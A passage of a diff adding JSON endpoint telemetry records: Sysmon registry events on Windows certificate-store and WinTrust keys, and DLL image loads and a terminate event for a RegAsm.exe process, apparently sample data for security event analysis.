"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "winspool.drv", + "image_path": "C:\\Windows\\SysWOW64\\winspool.drv", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570865119984, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\SysWOW64\\ole32.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\SysWOW64\\propsys.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570865119984, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868250000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868250000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868250000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868250000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868250000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868250000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868250000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868250000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868400000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\SysWOW64\\IPHLPAPI.DLL", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\SysWOW64\\bcrypt.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868550000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", 
+ "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust 
Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "process", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "subtype": "terminate", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868710000, + "unique_pid": 